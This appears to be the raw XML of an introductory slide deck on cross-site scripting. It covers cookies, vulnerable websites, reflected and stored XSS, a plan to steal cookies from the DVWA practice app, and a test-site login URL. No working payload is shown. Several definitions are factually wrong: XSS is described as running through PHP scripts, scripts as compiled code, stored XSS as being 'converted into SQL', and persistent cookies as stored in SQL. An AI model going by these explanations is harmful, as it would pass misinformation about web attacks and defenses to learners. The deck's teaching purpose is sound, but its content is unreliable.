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Lst>
  <p:sldSz cx="18288000" cy="10287000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Open Sans" charset="1" panose="020B0606030504020204"/>
      <p:regular r:id="rId6"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans Bold" charset="1" panose="020B0806030504020204"/>
      <p:regular r:id="rId7"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans Italics" charset="1" panose="020B0606030504020204"/>
      <p:regular r:id="rId8"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans Bold Italics" charset="1" panose="020B080603050402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rchivo Black" charset="1" panose="020B0A03020202020B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5.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId4" Target="slide6.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slid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http://testphp.vulnweb.com/login.php"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332067" y="2748993"/>
            <a:ext cx="6686234" cy="4789015"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4789015" w="6686234">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06876" y="3582788"/>
            <a:ext cx="7436041" cy="2712088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="10505"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9550" spc="191">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Archivo Black"/>
              </a:rPr>
              <a:t>XSS ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1406876" y="7398307"/>
            <a:ext cx="6066793" cy="422275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2499" spc="49">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>XSS reflexted - XSS stored</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1311626" y="7196146"/>
            <a:ext cx="7737124" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="104775">
            <a:solidFill>
              <a:srgbClr val="F6E7D8"/>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2578646" y="6292913"/>
            <a:ext cx="13130708" cy="1222374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="9349"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8499" spc="169">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Archivo Black"/>
              </a:rPr>
              <a:t>THANKS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="6923736" y="1028700"/>
            <a:ext cx="4440527" cy="3180527"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3180527" w="444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75438" y="4609775"/>
            <a:ext cx="7737124" cy="422275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="3499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2499" spc="124">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>THINK BEFORE YOU CLICK!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712371" y="1692556"/>
            <a:ext cx="10863257" cy="1238250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="9600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" spc="160">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Archivo Black"/>
              </a:rPr>
              <a:t>OBJECTIVES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2428104" y="6443324"/>
            <a:ext cx="2993446" cy="923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Defining what a cookie is and what a vulnerable website is.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7647277" y="6443324"/>
            <a:ext cx="2993446" cy="9232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What are XSS attacks and how do they work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12866450" y="6443324"/>
            <a:ext cx="2993446" cy="9232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Reporting and visualization of simulation results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3305195"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3305195"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sng">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8524368" y="4481171"/>
            <a:ext cx="1239263" cy="123926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1" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8524368"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sng">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13743542" y="4481171"/>
            <a:ext cx="1239263" cy="123926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4" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="13743542"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sng">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 15" id="15"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4284845" y="3014321"/>
            <a:ext cx="9718311" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>Attacking DVWA and steal cookie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216804" y="2837312"/>
            <a:ext cx="7042496" cy="4961247"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4961247" w="7042496">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7042496" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7042496" y="4961247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4961247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1311626" y="1085850"/>
            <a:ext cx="6610201" cy="2273300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="8800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" spc="160">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Archivo Black"/>
              </a:rPr>
              <a:t>WHAT IS A COOKIE?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1311626" y="4188369"/>
            <a:ext cx="7986411" cy="3405180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3412"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2437" spc="48">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>Files of information that websites store on the host device during browsing. They can contain sensitive user data depending on the type of cookie:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="526318" indent="-263159" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3412"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2437" spc="48">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>Persistent cookie: Contains the user's ID and is stored in the database in the form of SQL languag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2437" spc="48">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>e.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="526318" indent="-263159" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3412"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2437" spc="48">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>Session cookie: Defined as volatile, as it is deleted once the session is concluded</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="15543321" y="659971"/>
            <a:ext cx="1239263" cy="123926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7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="15543321" y="5679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311626" y="8750685"/>
            <a:ext cx="588648" cy="682491"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="682491" w="588648">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="588648" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="588648" y="682490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="682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3729093"/>
            <a:ext cx="8739650" cy="3988314"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3988314" w="8739650">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8739650" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8739650" y="3988314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3988314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="983200"/>
            <a:ext cx="8165799" cy="2273300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="8800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" spc="160">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Archivo Black"/>
              </a:rPr>
              <a:t>VULNERABLE WEB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11154851" y="3049839"/>
            <a:ext cx="4487415" cy="448310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="3639"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2599" spc="51">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>WHAT IS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11154851" y="3785516"/>
            <a:ext cx="6104449" cy="1335405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2639"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2399" spc="47">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>A vulnerable website has unsanitized user inputs; thus allowing users to input commands to manipulate the website and use malicious scripts.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11154851" y="6681814"/>
            <a:ext cx="4487415" cy="448310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="3639"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2599" spc="51">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>HOW TO IDENTIFY THEM.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11154851" y="7417491"/>
            <a:ext cx="6104449" cy="1002030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2639"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2399" spc="47">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>U try to use a cmd command like &lt;I&gt; (this converts all lines of text into italics) or test the site with “vuln web”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2225438" y="8944610"/>
            <a:ext cx="5281334" cy="313690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2419"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199" spc="43" u="sng">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:hlinkClick r:id="rId5" tooltip="http://testphp.vulnweb.com/login.php"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/login.php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087369" y="3077426"/>
            <a:ext cx="7322473" cy="4132149"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4132149" w="7322473">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7322473" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7322473" y="4132148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4132148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="639693"/>
            <a:ext cx="8441793" cy="2273300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="8800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" spc="160">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Archivo Black"/>
              </a:rPr>
              <a:t>WHAT IS A XSS ATTACCK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="3209754"/>
            <a:ext cx="8115300" cy="6237695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3340"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2386" spc="47">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>Attack executed on a website through the use of PHP language scripts. A script is code, written in a compiled programming language, used to automate functions of the operating system or other software. There are two types of XSS attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515208" indent="-257604" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3340"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2386" spc="47">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>XSS reflected: the code is executed directly. It requires two conditions, namely the presence of a vulnerable site and a malicious script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="515208" indent="-257604" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3340"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2386" spc="47">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>XSS stored: unlike reflected, this interacts with the database. The PHP-written script will be converted into SQL and sent to the database where it will remain permanent. It will then work with a cloned website with a poisoned database to deceive the user and steal their data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3340"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2386" spc="47">
                <a:solidFill>
                  <a:srgbClr val="F6E7D8"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
              </a:rPr>
              <a:t>Both work through phishing campaigns.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="15825643" y="767808"/>
            <a:ext cx="1239263" cy="123926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7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="15825643" y="675795"/>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9950175" y="2892221"/>
            <a:ext cx="7309125" cy="5936758"/>
          </a:xfrm>
          <a:custGeom>
